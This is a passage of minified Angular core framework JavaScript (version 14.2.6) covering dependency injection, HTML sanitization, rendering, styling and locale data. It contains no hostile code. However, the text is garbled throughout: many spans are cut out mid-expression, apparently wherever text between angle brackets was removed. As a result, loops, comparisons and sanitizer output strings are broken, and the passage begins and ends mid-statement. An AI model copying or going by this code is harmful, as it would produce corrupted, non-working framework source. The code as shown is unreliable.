a=t.prototype.constructor,e=a[mc]||Us(a),i=Object.prototype;let n=Object.getPrototypeOf(t.prototype).constructor;for(;n&&n!==i;){const r=n[mc]||Us(n);if(r&&r!==e)return r;n=Object.getPrototypeOf(n)}return r=>new r})}function Us(t){return Kp(t)?()=>{const a=Us(La(t));return a&&a()}:Qd(t)}function P0(t){const a=t[1],e=a.type;return 2===e?a.declTNode:1===e?t[6]:null}function Vr(t){return function S0(t,a){if("class"===a)return t.classes;if("style"===a)return t.styles;const e=t.attrs;if(e){const i=e.length;let n=0;for(;n{const i=function Wf(t){return function(...e){if(t){const i=t(...e);for(const n in i)this[n]=i[n]}}}(a);function n(...r){if(this instanceof n)return i.apply(this,r),this;const c=new n(...r);return d.annotation=c,d;function d(T,k,q){const Y=T.hasOwnProperty(Hl)?T[Hl]:Object.defineProperty(T,Hl,{value:[]})[Hl];for(;Y.length<=q;)Y.push(null);return(Y[q]=Y[q]||[]).push(c),T}}return e&&(n.prototype=Object.create(e.prototype)),n.prototype.ngMetadataName=t,n.annotationCls=n,n})}class ni{constructor(a,e){this._desc=a,this.ngMetadataName="InjectionToken",this.\u0275prov=void 0,"number"==typeof e?this.__NG_ELEMENT_ID__=e:void 0!==e&&(this.\u0275prov=hi({token:this,providedIn:e.providedIn||"root",factory:e.factory}))}get multi(){return this}toString(){return`InjectionToken ${this._desc}`}}function ac(t,a){void 0===a&&(a=t);for(let e=0;eArray.isArray(e)?Wc(e,a):a(e))}function P_(t,a,e){a>=t.length?t.push(e):t.splice(a,0,e)}function rh(t,a){return a>=t.length-1?t.pop():t.splice(a,1)[0]}function hd(t,a){const e=[];for(let i=0;i=0?t[1|i]=e:(i=~i,function N_(t,a,e,i){let n=t.length;if(n==a)t.push(e,i);else if(1===n)t.push(i,t[0]),t[0]=e;else{for(n--,t.push(t[n-1],t[n]);n>a;)t[n]=t[n-2],n--;t[a]=e,t[a+1]=i}}(t,i,a,e)),i}function ch(t,a){const e=Cl(t,a);if(e>=0)return t[1|e]}function Cl(t,a){return function fd(t,a,e){let i=0,n=t.length>>e;for(;n!==i;){const r=i+(n-i>>1),c=t[r<a?n=r:i=r+1}return~(n<t,createScript:t=>t,createScriptURL:t=>t})}catch(t){}return L0}())||void 0===a?void 0:a.createHTML(t))||t}function xC(){if(void 0===z0&&(z0=null,vo.trustedTypes))try{z0=vo.trustedTypes.createPolicy("angular#unsafe-bypass",{createHTML:t=>t,createScript:t=>t,createScriptURL:t=>t})}catch(t){}return z0}function wC(t){var a;return(null===(a=xC())||void 0===a?void 0:a.createHTML(t))||t}function XM(t){var a;return(null===(a=xC())||void 0===a?void 0:a.createScriptURL(t))||t}class ph{constructor(a){this.changingThisBreaksApplicationSecurity=a}toString(){return`SafeValue must use [property]=binding: ${this.changingThisBreaksApplicationSecurity} (see https://g.co/ng/security#xss)`}}class oE extends ph{getTypeName(){return"HTML"}}class rE extends ph{getTypeName(){return"Style"}}class IC extends ph{getTypeName(){return"Script"}}class sE extends ph{getTypeName(){return"URL"}}class RC extends ph{getTypeName(){return"ResourceURL"}}function Hc(t){return t instanceof ph?t.changingThisBreaksApplicationSecurity:t}function Fi(t,a){const e=function Uf(t){return t instanceof ph&&t.getTypeName()||null}(t);if(null!=e&&e!==a){if("ResourceURL"===e&&"URL"===a)return!0;throw new Error(`Required a safe ${a}, got a ${e} (see https://g.co/ng/security#xss)`)}return e===a}class lE{constructor(a){this.inertDocumentHelper=a}getInertBodyElement(a){a=""+a;try{const e=(new window.DOMParser).parseFromString(Hf(a),"text/html").body;return null===e?this.inertDocumentHelper.getInertBodyElement(a):(e.removeChild(e.firstChild),e)}catch(e){return null}}}class F0{constructor(a){if(this.defaultDoc=a,this.inertDocument=this.defaultDoc.implementation.createHTMLDocument("sanitization-inert"),null==this.inertDocument.body){const e=this.inertDocument.createElement("html");this.inertDocument.appendChild(e);const i=this.inertDocument.createElement("body");e.appendChild(i)}}getInertBodyElement(a){const e=this.inertDocument.createElement("template");if("content"in e)return e.innerHTML=Hf(a),e;const i=this.inertDocument.createElement("body");return i.innerHTML=Hf(a),this.defaultDoc.documentMode&&this.stripCustomNsAttrs(i),i}stripCustomNsAttrs(a){const e=a.attributes;for(let n=e.length-1;0"),!0}endElement(a){const e=a.nodeName.toLowerCase();H0.hasOwnProperty(e)&&!YM.hasOwnProperty(e)&&(this.buf.push(""))}chars(a){this.buf.push(q_(a))}checkClobberedElement(a,e){if(e&&(a.compareDocumentPosition(e)&Node.DOCUMENT_POSITION_CONTAINED_BY)===Node.DOCUMENT_POSITION_CONTAINED_BY)throw new Error(`Failed to sanitize html because the element is clobbered: ${a.outerHTML}`);return e}}const Ml=/[\uD800-\uDBFF][\uDC00-\uDFFF]/g,tv=/([^\#-~ |!])/g;function q_(t){return t.replace(/&/g,"&").replace(Ml,function(a){return"&#"+(1024*(a.charCodeAt(0)-55296)+(a.charCodeAt(1)-56320)+65536)+";"}).replace(tv,function(a){return"&#"+a.charCodeAt(0)+";"}).replace(//g,">")}let q0;function iv(t,a){let e=null;try{q0=q0||function U_(t){const a=new F0(t);return function dE(){try{return!!(new window.DOMParser).parseFromString(Hf(""),"text/html")}catch(t){return!1}}()?new lE(a):a}(t);let i=a?String(a):"";e=q0.getInertBodyElement(i);let n=5,r=i;do{if(0===n)throw new Error("Failed to sanitize html because the input is unstable");n--,i=r,r=e.innerHTML,e=q0.getInertBodyElement(i)}while(i!==r);return Hf((new U0).sanitizeChildren(G_(e)||e))}finally{if(e){const i=G_(e)||e;for(;i.firstChild;)i.removeChild(i.firstChild)}}}function G_(t){return"content"in t&&function Gf(t){return t.nodeType===Node.ELEMENT_NODE&&"TEMPLATE"===t.nodeName}(t)?t.content:null}var oo=(()=>((oo=oo||{})[oo.NONE=0]="NONE",oo[oo.HTML=1]="HTML",oo[oo.STYLE=2]="STYLE",oo[oo.SCRIPT=3]="SCRIPT",oo[oo.URL=4]="URL",oo[oo.RESOURCE_URL=5]="RESOURCE_URL",oo))();function Uc(t){const a=j_();return a?wC(a.sanitize(oo.HTML,t)||""):Fi(t,"HTML")?wC(Hc(t)):iv(function $M(){return void 0!==H_?H_:"undefined"!=typeof document?document:void 0}(),Qa(t))}function nm(t){const a=j_();return a?a.sanitize(oo.URL,t)||"":Fi(t,"URL")?Hc(t):B0(Qa(t))}function PC(t){const a=j_();if(a)return XM(a.sanitize(oo.RESOURCE_URL,t)||"");if(Fi(t,"ResourceURL"))return XM(Hc(t));throw new gi(904,!1)}function j_(){const t=bi();return t&&t[12]}const OC=new ni("ENVIRONMENT_INITIALIZER"),ov=new ni("INJECTOR",-1),rv=new ni("INJECTOR_DEF_TYPES");class sv{get(a,e=pi){if(e===pi){const i=new Error(`NullInjectorError: No provider for ${Wo(a)}!`);throw i.name="NullInjectorError",i}return e}}function CE(...t){return{\u0275providers:cv(0,t)}}function cv(t,...a){const e=[],i=new Set;let n;return Wc(a,r=>{const c=r;NC(c,e,[],i)&&(n||(n=[]),n.push(c))}),void 0!==n&&lv(n,e),e}function lv(t,a){for(let e=0;e{a.push(r)})}}function NC(t,a,e,i){if(!(t=La(t)))return!1;let n=null,r=Xp(t);const c=!r&&Un(t);if(r||c){if(c&&!c.standalone)return!1;n=t}else{const T=t.ngModule;if(r=Xp(T),!r)return!1;n=T}const d=i.has(n);if(c){if(d)return!1;if(i.add(n),c.dependencies){const T="function"==typeof c.dependencies?c.dependencies():c.dependencies;for(const k of T)NC(k,a,e,i)}}else{if(!r)return!1;{if(null!=r.imports&&!d){let k;i.add(n);try{Wc(r.imports,q=>{NC(q,a,e,i)&&(k||(k=[]),k.push(q))})}finally{}void 0!==k&&lv(k,a)}if(!d){const k=Qd(n)||(()=>new n);a.push({provide:n,useFactory:k,deps:Xn},{provide:rv,useValue:n,multi:!0},{provide:OC,useValue:()=>At(n),multi:!0})}const T=r.providers;null==T||d||Wc(T,q=>{a.push(q)})}}return n!==t&&void 0!==t.providers}const fe=Bn({provide:String,useValue:Bn});function ce(t){return null!==t&&"object"==typeof t&&fe in t}function je(t){return"function"==typeof t}const dt=new ni("Set Injector scope."),_t={},gt={};let kt;function Lt(){return void 0===kt&&(kt=new sv),kt}class Ht{}class ui extends Ht{constructor(a,e,i,n){super(),this.parent=e,this.source=i,this.scopes=n,this.records=new Map,this._ngOnDestroyHooks=new Set,this._onDestroyHooks=[],this._destroyed=!1,Qi(a,c=>this.processProvider(c)),this.records.set(ov,ta(void 0,this)),n.has("environment")&&this.records.set(Ht,ta(void 0,this));const r=this.records.get(dt);null!=r&&"string"==typeof r.value&&this.scopes.add(r.value),this.injectorDefTypes=new Set(this.get(rv.multi,Xn,Da.Self))}get destroyed(){return this._destroyed}destroy(){this.assertNotDestroyed(),this._destroyed=!0;try{for(const a of this._ngOnDestroyHooks)a.ngOnDestroy();for(const a of this._onDestroyHooks)a()}finally{this.records.clear(),this._ngOnDestroyHooks.clear(),this.injectorDefTypes.clear(),this._onDestroyHooks.length=0}}onDestroy(a){this._onDestroyHooks.push(a)}runInContext(a){this.assertNotDestroyed();const e=sr(this),i=Bs(void 0);try{return a()}finally{sr(e),Bs(i)}}get(a,e=pi,i=Da.Default){this.assertNotDestroyed();const n=sr(this),r=Bs(void 0);try{if(!(i&Da.SkipSelf)){let d=this.records.get(a);if(void 0===d){const T=function Mn(t){return"function"==typeof t||"object"==typeof t&&t instanceof ni}(a)&&Hu(a);d=T&&this.injectableDefInScope(T)?ta(Ki(a),_t):null,this.records.set(a,d)}if(null!=d)return this.hydrate(a,d)}return(i&Da.Self?Lt():this.parent).get(a,e=i&Da.Optional&&e===pi?null:e)}catch(c){if("NullInjectorError"===c.name){if((c[_a]=c[_a]||[]).unshift(Wo(a)),n)throw c;return function mh(t,a,e,i){const n=t[_a];throw a[Dr]&&n.unshift(a[Dr]),t.message=function z_(t,a,e,i=null){t=t&&"\n"===t.charAt(0)&&"\u0275"==t.charAt(1)?t.slice(2):t;let n=Wo(a);if(Array.isArray(a))n=a.map(Wo).join(" -> ");else if("object"==typeof a){let r=[];for(let c in a)if(a.hasOwnProperty(c)){let d=a[c];r.push(c+":"+("string"==typeof d?JSON.stringify(d):Wo(d)))}n=`{${r.join(", ")}}`}return`${e}${i?"("+i+")":""}[${n}]: ${t.replace(ca,"\n ")}`}("\n"+t.message,n,e,i),t.ngTokenPath=n,t[_a]=null,t}(c,a,"R3InjectorError",this.source)}throw c}finally{Bs(r),sr(n)}}resolveInjectorInitializers(){const a=sr(this),e=Bs(void 0);try{const i=this.get(OC.multi,Xn,Da.Self);for(const n of i)n()}finally{sr(a),Bs(e)}}toString(){const a=[],e=this.records;for(const i of e.keys())a.push(Wo(i));return`R3Injector[${a.join(", ")}]`}assertNotDestroyed(){if(this._destroyed)throw new gi(205,!1)}processProvider(a){let e=je(a=La(a))?a:La(a&&a.provide);const i=function Ui(t){return ce(t)?ta(void 0,t.useValue):ta(dn(t),_t)}(a);if(je(a)||!0!==a.multi)this.records.get(e);else{let n=this.records.get(e);n||(n=ta(void 0,_t,!0),n.factory=()=>Vf(n.multi),this.records.set(e,n)),e=a,n.multi.push(a)}this.records.set(e,i)}hydrate(a,e){return e.value===_t&&(e.value=gt,e.value=e.factory()),"object"==typeof e.value&&e.value&&function To(t){return null!==t&&"object"==typeof t&&"function"==typeof t.ngOnDestroy}(e.value)&&this._ngOnDestroyHooks.add(e.value),e.value}injectableDefInScope(a){if(!a.providedIn)return!1;const e=La(a.providedIn);return"string"==typeof e?"any"===e||this.scopes.has(e):this.injectorDefTypes.has(e)}}function Ki(t){const a=Hu(t),e=null!==a?a.factory:Qd(t);if(null!==e)return e;if(t instanceof ni)throw new gi(204,!1);if(t instanceof Function)return function Ni(t){const a=t.length;if(a>0)throw hd(a,"?"),new gi(204,!1);const e=function W2(t){const a=t&&(t[Ll]||t[Mf]);if(a){const e=function ls(t){if(t.hasOwnProperty("name"))return t.name;const a=(""+t).match(/^function\s*([^\s(]+)/);return null===a?"":a[1]}(t);return console.warn(`DEPRECATED: DI is instantiating a token "${e}" that inherits its @Injectable decorator but does not provide one itself.\nThis will become an error in a future version of Angular. Please add @Injectable() to the "${e}" class.`),a}return null}(t);return null!==e?()=>e.factory(t):()=>new t}(t);throw new gi(204,!1)}function dn(t,a,e){let i;if(je(t)){const n=La(t);return Qd(n)||Ki(n)}if(ce(t))i=()=>La(t.useValue);else if(function _e(t){return!(!t||!t.useFactory)}(t))i=()=>t.useFactory(...Vf(t.deps||[]));else if(function ge(t){return!(!t||!t.useExisting)}(t))i=()=>At(La(t.useExisting));else{const n=La(t&&(t.useClass||t.provide));if(!function na(t){return!!t.deps}(t))return Qd(n)||Ki(n);i=()=>new n(...Vf(t.deps))}return i}function ta(t,a,e=!1){return{factory:t,value:a,multi:e?[]:void 0}}function qa(t){return!!t.\u0275providers}function Qi(t,a){for(const e of t)Array.isArray(e)?Qi(e,a):qa(e)?Qi(e.\u0275providers,a):a(e)}class Yn{}class Gc{resolveComponentFactory(a){throw function Ka(t){const a=Error(`No component factory found for ${Wo(t)}. Did you add it to @NgModule.entryComponents?`);return a.ngComponent=t,a}(a)}}let On=(()=>{class t{}return t.NULL=new Gc,t})();function Ps(){return jc(or(),bi())}function jc(t,a){return new mi(pc(t,a))}let mi=(()=>{class t{constructor(e){this.nativeElement=e}}return t.__NG_ELEMENT_ID__=Ps,t})();function yc(t){return t instanceof mi?t.nativeElement:t}class qs{}let wr=(()=>{class t{}return t.__NG_ELEMENT_ID__=()=>function _h(){const t=bi(),e=hs(or().index,t);return(us(e)?e:t)[11]}(),t})(),gh=(()=>{class t{}return t.\u0275prov=hi({token:t,providedIn:"root",factory:()=>null}),t})();class nc{constructor(a){this.full=a,this.major=a.split(".")[0],this.minor=a.split(".")[1],this.patch=a.split(".").slice(2).join(".")}}const Ch=new nc("14.2.6"),Ul={};function AE(t){return t.ngOriginalError}class yh{constructor(){this._console=console}handleError(a){const e=this._findOriginalError(a);this._console.error("ERROR",a),e&&this._console.error("ORIGINAL ERROR",e)}_findOriginalError(a){let e=a&&AE(a);for(;e&&AE(e);)e=AE(e);return e||null}}const TE=new Map;let see=0;const DE="__ngContext__";function bc(t,a){us(a)?(t[DE]=a[20],function lee(t){TE.set(t[20],t)}(a)):t[DE]=a}function zC(t){return t.ownerDocument.defaultView}function $c(t){return t.ownerDocument}function bh(t){return t instanceof Function?t():t}var vl=(()=>((vl=vl||{})[vl.Important=1]="Important",vl[vl.DashCase=2]="DashCase",vl))();function wE(t,a){return undefined(t,a)}function WC(t){const a=t[3];return Is(a)?a[3]:a}function IE(t){return iR(t[13])}function RE(t){return iR(t[4])}function iR(t){for(;null!==t&&!Is(t);)t=t[4];return t}function j0(t,a,e,i,n){if(null!=i){let r,c=!1;Is(i)?r=i:us(i)&&(c=!0,i=i[0]);const d=Ar(i);0===t&&null!==e?null==n?cR(a,e,d):$_(a,e,d,n||null,!0):1===t&&null!==e?$_(a,e,d,n||null,!0):2===t?function pR(t,a,e){const i=dv(t,a);i&&function Oee(t,a,e,i){t.removeChild(a,e,i)}(t,i,a,e)}(a,d,c):3===t&&a.destroyNode(d),null!=r&&function zee(t,a,e,i,n){const r=e[7];r!==Ar(e)&&j0(a,t,i,r,n);for(let d=10;d0&&(t[e-1][4]=i[4]);const r=rh(t,10+a);!function Dee(t,a){FC(t,a,a[11],2,null,null),a[0]=null,a[6]=null}(i[1],i);const c=r[19];null!==c&&c.detachView(r[1]),i[3]=null,i[4]=null,i[2]&=-65}return i}function oR(t,a){if(!(128&a[2])){const e=a[11];e.destroyNode&&FC(t,a,e,3,null,null),function Iee(t){let a=t[13];if(!a)return OE(t[1],t);for(;a;){let e=null;if(us(a))e=a[13];else{const i=a[10];i&&(e=i)}if(!e){for(;a&&!a[4]&&a!==t;)us(a)&&OE(a[1],a),a=a[3];null===a&&(a=t),us(a)&&OE(a[1],a),e=a&&a[4]}a=e}}(a)}}function OE(t,a){if(!(128&a[2])){a[2]&=-65,a[2]|=128,function Pee(t,a){let e;if(null!=t&&null!=(e=t.destroyHooks))for(let i=0;i=0?i[n=k]():i[n=-k].unsubscribe(),r+=2}else{const c=i[n=e[r+1]];e[r].call(c)}if(null!==i){for(let r=n+1;rr?"":n[Y+1].toLowerCase();const pe=8&i?te:null;if(pe&&-1!==CR(pe,k,0)||2&i&&k!==te){if(om(i))return!1;c=!0}}}}else{if(!c&&!om(i)&&!om(T))return!1;if(c&&om(T))continue;c=!1,i=T|1&i}}return om(i)||c}function om(t){return 0==(1&t)}function Hee(t,a,e,i){if(null===a)return-1;let n=0;if(i||!e){let r=!1;for(;n-1)for(e++;e0?'="'+d+'"':"")+"]"}else 8&i?n+="."+c:4&i&&(n+=" "+c);else""!==n&&!om(c)&&(a+=vR(r,n),n=""),i=c,r=r||!om(i);e++}return""!==n&&(a+=vR(r,n)),a}const mn={};function g(t){AR(Rn(),bi(),Ss()+t,!1)}function AR(t,a,e,i){if(!i)if(3==(3&a[2])){const r=t.preOrderCheckHooks;null!==r&&ji(a,r,e)}else{const r=t.preOrderHooks;null!==r&&Zu(a,r,0,e)}hl(e)}function xR(t,a=null,e=null,i){const n=wR(t,a,e,i);return n.resolveInjectorInitializers(),n}function wR(t,a=null,e=null,i,n=new Set){const r=[e||Xn,CE(t)];return i=i||("object"==typeof t?void 0:Wo(t)),new ui(r,a||Lt(),i||null,n)}let Ko=(()=>{class t{static create(e,i){var n;if(Array.isArray(e))return xR({name:""},i,e,"");{const r=null!==(n=e.name)&&void 0!==n?n:"";return xR({name:r},e.parent,e.providers,r)}}}return t.THROW_IF_NOT_FOUND=pi,t.NULL=new sv,t.\u0275prov=hi({token:t,providedIn:"any",factory:()=>At(ov)}),t.__NG_ELEMENT_ID__=-1,t})();function Ee(t,a=Da.Default){const e=bi();return null===e?At(t,a):Zd(or(),e,La(t),a)}function _d(){throw new Error("invalid")}function fv(t,a){return t<<17|a<<2}function rm(t){return t>>17&32767}function UE(t){return 2|t}function Mh(t){return(131068&t)>>2}function qE(t,a){return-131069&t|a<<2}function GE(t){return 1|t}function GR(t,a){const e=t.contentQueries;if(null!==e)for(let i=0;i22&&AR(t,a,22,!1),e(i,n)}finally{hl(r)}}function QR(t,a,e){if(Gu(a)){const n=a.directiveEnd;for(let r=a.directiveStart;r0;){const e=t[--a];if("number"==typeof e&&e<0)return e}return 0})(d)!=T&&d.push(T),d.push(i,n,c)}}function eS(t,a){null!==t.hostBindings&&t.hostBindings(1,a)}function tS(t,a){a.flags|=2,(t.components||(t.components=[])).push(a.index)}function Wte(t,a,e){if(e){if(a.exportAs)for(let i=0;i0&&rD(e)}}function rD(t){for(let i=IE(t);null!==i;i=RE(i))for(let n=10;n0&&rD(r)}const e=t[1].components;if(null!==e)for(let i=0;i0&&rD(n)}}function Gte(t,a){const e=hs(a,t),i=e[1];(function jte(t,a){for(let e=a.length;e-1&&(PE(a,i),rh(e,i))}this._attachedToViewContainer=!1}oR(this._lView[1],this._lView)}onDestroy(a){KR(this._lView[1],this._lView,null,a)}markForCheck(){sD(this._cdRefInjectingView||this._lView)}detach(){this._lView[2]&=-65}reattach(){this._lView[2]|=64}detectChanges(){bv(this._lView[1],this._lView,this.context)}checkNoChanges(){}attachToViewContainerRef(){if(this._appRef)throw new gi(902,!1);this._attachedToViewContainer=!0}detachFromAppRef(){this._appRef=null,function wee(t,a){FC(t,a,a[11],2,null,null)}(this._lView[1],this._lView)}attachToAppRef(a){if(this._attachedToViewContainer)throw new gi(902,!1);this._appRef=a}}class Qte extends VC{constructor(a){super(a),this._view=a}detectChanges(){const a=this._view;bv(a[1],a,a[8],!1)}checkNoChanges(){}get context(){return null}}class dD extends On{constructor(a){super(),this.ngModule=a}resolveComponentFactory(a){const e=Un(a);return new BC(e,this.ngModule)}}function lS(t){const a=[];for(let e in t)t.hasOwnProperty(e)&&a.push({propName:t[e],templateName:e});return a}class Kte{constructor(a,e){this.injector=a,this.parentInjector=e}get(a,e,i){const n=this.injector.get(a,Ul,i);return n!==Ul||e===Ul?n:this.parentInjector.get(a,e,i)}}class BC extends Yn{constructor(a,e){super(),this.componentDef=a,this.ngModule=e,this.componentType=a.type,this.selector=function $ee(t){return t.map(Qee).join(",")}(a.selectors),this.ngContentSelectors=a.ngContentSelectors?a.ngContentSelectors:[],this.isBoundToModule=!!e}get inputs(){return lS(this.componentDef.inputs)}get outputs(){return lS(this.componentDef.outputs)}create(a,e,i,n){let r=(n=n||this.ngModule)instanceof Ht?n:null==n?void 0:n.injector;r&&null!==this.componentDef.getStandaloneInjector&&(r=this.componentDef.getStandaloneInjector(r)||r);const c=r?new Kte(a,r):a,d=c.get(qs,null);if(null===d)throw new gi(407,!1);const T=c.get(gh,null),k=d.createRenderer(null,this.componentDef),q=this.componentDef.selectors[0][0]||"div",Y=i?function wte(t,a,e){return t.selectRootElement(a,e===dc.ShadowDom)}(k,i,this.componentDef.encapsulation):kE(d.createRenderer(null,this.componentDef),q,function $te(t){const a=t.toLowerCase();return"svg"===a?"svg":"math"===a?"math":null}(q)),te=this.componentDef.onPush?288:272,pe=aD(0,null,null,1,0,null,null,null,null,null),Re=gv(null,pe,null,te,null,null,d,k,T,c,null);let Fe,Ne;C_(Re);try{const et=function Jte(t,a,e,i,n,r){const c=e[1];e[22]=t;const T=$0(c,22,2,"#host",null),k=T.mergedAttrs=a.hostAttrs;null!==k&&(Mv(T,k,!0),null!==t&&(Nf(n,t,k),null!==T.classes&&WE(n,t,T.classes),null!==T.styles&&gR(n,t,T.styles)));const q=i.createRenderer(t,a),Y=gv(e,$R(a),null,a.onPush?32:16,e[22],T,i,q,r||null,null,null);return c.firstCreatePass&&(Km(ah(T,e),c,a.type),tS(c,T),iS(T,e.length,1)),yv(e,Y),e[22]=Y}(Y,this.componentDef,Re,d,k);if(Y)if(i)Nf(k,Y,["ng-version",Ch.full]);else{const{attrs:ut,classes:Ze}=function Kee(t){const a=[],e=[];let i=1,n=2;for(;i0&&WE(k,Y,Ze.join(" "))}if(Ne=d_(pe,22),void 0!==e){const ut=Ne.projection=[];for(let Ze=0;Ze=0;i--){const n=t[i];n.hostVars=a+=n.hostVars,n.hostAttrs=jm(n.hostAttrs,e=jm(e,n.hostAttrs))}}(i)}function mD(t){return t===Ud?{}:t===Xn?[]:t}function iie(t,a){const e=t.viewQuery;t.viewQuery=e?(i,n)=>{a(i,n),e(i,n)}:a}function aie(t,a){const e=t.contentQueries;t.contentQueries=e?(i,n,r)=>{a(i,n,r),e(i,n,r)}:a}function nie(t,a){const e=t.hostBindings;t.hostBindings=e?(i,n)=>{a(i,n),e(i,n)}:a}let Av=null;function K_(){if(!Av){const t=vo.Symbol;if(t&&t.iterator)Av=t.iterator;else{const a=Object.getOwnPropertyNames(Map.prototype);for(let e=0;ed(Ar(It[i.index])):i.index;let yt=null;if(!d&&T&&(yt=function gie(t,a,e,i){const n=t.cleanup;if(null!=n)for(let r=0;rT?d[T]:null}"string"==typeof c&&(r+=2)}return null}(t,a,n,i.index)),null!==yt)(yt.__ngLastListenerFn__||yt).__ngNextListenerFn__=r,yt.__ngLastListenerFn__=r,pe=!1;else{r=AS(i,a,Y,r,!1);const It=e.listen(et,n,r);te.push(r,It),q&&q.push(n,Ze,ut,ut+1)}}else r=AS(i,a,Y,r,!1);const Re=i.outputs;let Fe;if(pe&&null!==Re&&(Fe=Re[n])){const Ne=Fe.length;if(Ne)for(let et=0;et0;)a=a[15],t--;return a}(t,Ua.lFrame.contextLView))[8]}(t)}function Cie(t,a){let e=null;const i=function Uee(t){const a=t.attrs;if(null!=a){const e=a.indexOf(5);if(0==(1&e))return a[e+1]}return null}(t);for(let n=0;n=0}const Os={textEnd:0,key:0,keyEnd:0,value:0,valueEnd:0};function kS(t){return t.substring(Os.key,Os.keyEnd)}function vie(t){return t.substring(Os.value,Os.valueEnd)}function PS(t,a){const e=Os.textEnd;return e===a?-1:(a=Os.keyEnd=function Eie(t,a,e){for(;a32;)a++;return a}(t,Os.key=a,e),r1(t,a,e))}function OS(t,a){const e=Os.textEnd;let i=Os.key=r1(t,a,e);return e===i?-1:(i=Os.keyEnd=function Die(t,a,e){let i;for(;a=65&&(-33&i)<=90||i>=48&&i<=57);)a++;return a}(t,i,e),i=LS(t,i,e),i=Os.value=r1(t,i,e),i=Os.valueEnd=function xie(t,a,e){let i=-1,n=-1,r=-1,c=a,d=c;for(;c32&&(d=c),r=n,n=i,i=-33&T}return d}(t,i,e),LS(t,i,e))}function NS(t){Os.key=0,Os.keyEnd=0,Os.value=0,Os.valueEnd=0,Os.textEnd=t.length}function r1(t,a,e){for(;a=0;e=OS(a,e))VS(t,kS(a),vie(a))}function _D(t){cm(_s,ou,t,!0)}function ou(t,a){for(let e=function Aie(t){return NS(t),PS(t,r1(t,0,Os.textEnd))}(a);e>=0;e=PS(a,e))_s(t,kS(a),!0)}function sm(t,a,e,i){const n=bi(),r=Rn(),c=ul(2);r.firstUpdatePass&&FS(r,t,c,i),a!==mn&&Mc(n,c,a)&&BS(r,r.data[Ss()],n,n[11],t,n[c+1]=function Nie(t,a){return null==t||("string"==typeof a?t+=a:"object"==typeof t&&(t=Wo(Hc(t)))),t}(a,e),i,c)}function cm(t,a,e,i){const n=Rn(),r=ul(2);n.firstUpdatePass&&FS(n,null,r,i);const c=bi();if(e!==mn&&Mc(c,r,e)){const d=n.data[Ss()];if(US(d,i)&&!WS(n,r)){let T=i?d.classesWithoutHost:d.stylesWithoutHost;null!==T&&(e=ss(T,e||"")),hD(n,d,c,e,i)}else!function Oie(t,a,e,i,n,r,c,d){n===mn&&(n=Xn);let T=0,k=0,q=0=t.expandoStartIndex}function FS(t,a,e,i){const n=t.data;if(null===n[e+1]){const r=n[Ss()],c=WS(t,e);US(r,i)&&null===a&&!c&&(a=!1),a=function Iie(t,a,e,i){const n=Pf(t);let r=i?a.residualClasses:a.residualStyles;if(null===n)0===(i?a.classBindings:a.styleBindings)&&(e=jC(e=gD(null,t,a,e,i),a.attrs,i),r=null);else{const c=a.directiveStylingLast;if(-1===c||t[c]!==n)if(e=gD(n,t,a,e,i),null===r){let T=function Rie(t,a,e){const i=e?a.classBindings:a.styleBindings;if(0!==Mh(i))return t[rm(i)]}(t,a,i);void 0!==T&&Array.isArray(T)&&(T=gD(null,t,a,T[1],i),T=jC(T,a.attrs,i),function Sie(t,a,e,i){t[rm(e?a.classBindings:a.styleBindings)]=i}(t,a,i,T))}else r=function kie(t,a,e){let i;const n=a.directiveEnd;for(let r=1+a.directiveStylingLast;r0)&&(k=!0)}else q=e;if(n)if(0!==T){const te=rm(t[d+1]);t[i+1]=fv(te,d),0!==te&&(t[te+1]=qE(t[te+1],i)),t[d+1]=function fte(t,a){return 131071&t|a<<17}(t[d+1],i)}else t[i+1]=fv(d,0),0!==d&&(t[d+1]=qE(t[d+1],i)),d=i;else t[i+1]=fv(T,0),0===d?d=i:t[T+1]=qE(t[T+1],i),T=i;k&&(t[i+1]=UE(t[i+1])),SS(t,q,i,!0),SS(t,q,i,!1),function bie(t,a,e,i,n){const r=n?t.residualClasses:t.residualStyles;null!=r&&"string"==typeof a&&Cl(r,a)>=0&&(e[i+1]=GE(e[i+1]))}(a,q,t,i,r),c=fv(d,T),r?a.classBindings=c:a.styleBindings=c}(n,r,a,e,c,i)}}function gD(t,a,e,i,n){let r=null;const c=e.directiveEnd;let d=e.directiveStylingLast;for(-1===d?d=e.directiveStart:d++;d0;){const T=t[n],k=Array.isArray(T),q=k?T[1]:T,Y=null===q;let te=e[n+1];te===mn&&(te=Y?Xn:void 0);let pe=Y?ch(te,i):q===i?te:void 0;if(k&&!Ev(pe)&&(pe=ch(T,i)),Ev(pe)&&(d=pe,c))return d;const Re=t[n+1];n=c?rm(Re):Mh(Re)}if(null!==a){let T=r?a.residualClasses:a.residualStyles;null!=T&&(d=ch(T,i))}return d}function Ev(t){return void 0!==t}function US(t,a){return 0!=(t.flags&(a?16:32))}function s(t,a=""){const e=bi(),i=Rn(),n=t+22,r=i.firstCreatePass?$0(i,n,1,a,null):i.data[n],c=e[n]=function SE(t,a){return t.createText(a)}(e[11],a);mv(i,e,c,r),_c(r,!1)}function ke(t){return ct("",t,""),ke}function ct(t,a,e){const i=bi(),n=Y0(i,t,a,e);return n!==mn&&vh(i,Ss(),n),ct}function za(t,a,e,i,n){const r=bi(),c=J0(r,t,a,e,i,n);return c!==mn&&vh(r,Ss(),c),za}function Y_(t,a,e,i,n,r,c){const d=bi(),T=Z0(d,t,a,e,i,n,r,c);return T!==mn&&vh(d,Ss(),T),Y_}function Dv(t,a,e){cm(_s,ou,Y0(bi(),t,a,e),!0)}function XS(t,a,e){!function nu(t){cm(VS,wie,t,!1)}(Y0(bi(),t,a,e))}function Gs(t,a,e){const i=bi();return Mc(i,cd(),a)&&ql(Rn(),rr(),i,t,a,i[11],e,!0),Gs}function s1(t,a,e){const i=bi();if(Mc(i,cd(),a)){const r=Rn(),c=rr();ql(r,c,i,t,a,sS(Pf(r.data),c,i),e,!0)}return s1}const J_=void 0;var Zie=["en",[["a","p"],["AM","PM"],J_],[["AM","PM"],J_,J_],[["S","M","T","W","T","F","S"],["Sun","Mon","Tue","Wed","Thu","Fri","Sat"],["Sunday","Monday","Tuesday","Wednesday","Thursday","Friday","Saturday"],["Su","Mo","Tu","We","Th","Fr","Sa"]],J_,[["J","F","M","A","M","J","J","A","S","O","N","D"],["Jan","Feb","Mar","Apr","May","Jun","Jul","Aug","Sep","Oct","Nov","Dec"],["January","February","March","April","May","June","July","August","September","October","November","December"]],J_,[["B","A"],["BC","AD"],["Before Christ","Anno Domini"]],0,[6,0],["M/d/yy","MMM d, y","MMMM d, y","EEEE, MMMM d, y"],["h:mm a","h:mm:ss a","h:mm:ss a z","h:mm:ss a 